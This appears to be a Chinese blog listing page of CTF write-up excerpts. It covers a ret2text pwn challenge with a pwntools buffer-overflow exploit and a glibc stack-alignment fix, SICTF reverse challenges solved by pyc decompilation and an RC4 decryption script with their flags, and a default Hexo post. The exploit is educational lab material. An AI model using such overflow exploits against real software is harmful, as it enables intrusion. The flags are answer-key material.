今天看一个ret2text的题目的时候,遇到了exp本地不通,远程通的奇怪问题,题目是这样的
有个backdoor函数是这样的
exp是这样的
from pwn import *
elf = context.binary = ELF('./Intruduce')
p = process()
context.log_level='debug'
payload=b'a'* (32 + 8)
backd00r=0x4011B6
payload+=p64(backd00r)
s=p.recvline() ; print(s)
print(s)
char=p.recv(1)
print(char)
p.sendline(payload)
p.interactive()
gdb调试了一下发现在call system的时候卡在了这个xmm寄存器里
搜索了一下,在这里找到了解决方法 https://blog.csdn.net/fjh1997/article/details/107695261
发现是glibc >= 2.27的时候 system函数里面会调用xmm寄存器,xmm寄存器要求16字节对齐,远程的环境应该是<2.27的所以可以直接打通,然后我本地的glibc版本是2.35的,所以会因为xmm寄存器内存对齐的原因导致exp打不通,只需要少push一个地址,内存就对齐了
Read More
Reverse
[签到]PYC
电脑上的pycdc出问题了,就找个在线的
https://www.lddgo.net/string/pyc-compile-decompile
print(‘SICTF{07e278e7-9d66-4d90-88fc-8bd61e490616}’)
Myobject
rc4加解密,写个脚本
def rc4(key, plaintext):
S = list(range(256))
j = 0
for i in range(256):
j = (j + S[i] + key[i % len(key)]) % 256
S[i], S[j] = S[j], S[i]
i = 0
j = 0
output = []
for byte in plaintext:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = S[j], S[i]
K = S[(S[i] + S[j]) % 256]
output.append(byte ^ K)
return output
key = [ord(char) for char in "SIFLAG"]
v18_bytes = (0x47CF225A0ED32730).to_bytes(8, byteorder='little')
ciphertext_v19 = [71, 107, 11, 229, 141, 83, 186, 153, 195, 133, 7]
v20_bytes = (0x9F88FE10771C0107).to_bytes(8, byteorder='little')
full_ciphertext_27 = list(v18_bytes) + ciphertext_v19 + list(v20_bytes)
decrypted_full_combined = rc4(key, full_ciphertext_27)
decrypted_full_combined_string = ''.join([chr(byte) for byte in decrypted_full_combined])
print(decrypted_full_combined_string)
SICTF{wow_you_get_the_flag}
Read More
Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.
Quick Start
Create a new post
$ hexo new "My New Post"
More info: Writing
Run server
$ hexo server
More info: Server
Generate static files
$ hexo generate
Read More